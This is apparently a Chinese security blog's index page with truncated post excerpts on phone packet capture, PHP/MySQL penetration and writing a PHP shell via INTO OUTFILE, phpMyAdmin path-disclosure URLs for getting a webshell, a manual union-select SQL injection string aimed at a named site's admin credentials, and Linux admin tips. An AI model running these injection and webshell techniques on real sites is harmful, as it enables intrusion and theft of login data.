关于友情链接 做链接的朋友请进!!!

30
2016
01

手机抓包方法实践

Wireshark 应该算是综合排名第一的工具(其实 Wireshark 自带的命令行工具 tshark 更牛逼)


本文总结记录了 5 种抓包方式,掌握其一即可进行实践,欢迎大家一起交流分享


0x01 基于 Wireshark


实验步骤:


1.1 在电脑主机上使用猎豹或者360 Wifi之类的工具,开启热点,将所要测试的手机连接该热点,记录其IP地

16
2016
01

php+mysql快速渗透


1)如何快速寻找站点注入漏洞?

2)PHP+MYSQL数据库下快速寻找WEB站点路径?  

3)MYSQL LOAD FILE()下读取文件?

3)MYSQL INTO OUTFILE下写入PHPSHELL?



简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文

16
2016
01

phpmyadmin后台拿webshell

phpmyadmin爆路径方法:

weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php

http://url/phpmyadmin/libraries/select_lang.lib.php 

pphpmyadmin/libraries/export/xls.php 

hpmyadmin\themes\darkblue_orange\layout.inc.php&n

16
2016
01

手工注入通用语句总结

http://www.worldsroses.com/productview.asp?id=211  and 1=2 union select top 1 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,username,19,20,21 from (select top 1 username,password from (select top 2 username,password from admin where 1=1 order by u

05
2016
01

如何在Linux下设置系统时区和时间

作为一名运维搬砖工,学会如何保证Linux系统时间准确性,无论对业务系统还是其他常规系统的运行来说,都是相对重要滴。

一、查看和修改Linux的时区

1. 查看当前时区

命令 : “date -R”


2. 修改设置Linux服务器时区

方法 A

命令 : “tzselect”


方法 B 仅限于RedHat Linux 和 CentOS

命令 : “

05
2016
01

如何在Linux或Windows中卸载/安装阿里云安骑士

如果你不想使用云盾安骑士防护服务,可以按下列步骤卸载:


linux类型系统:


wget http://update.aegis.aliyun.com/download/uninstall.sh   

chmod +x uninstall.sh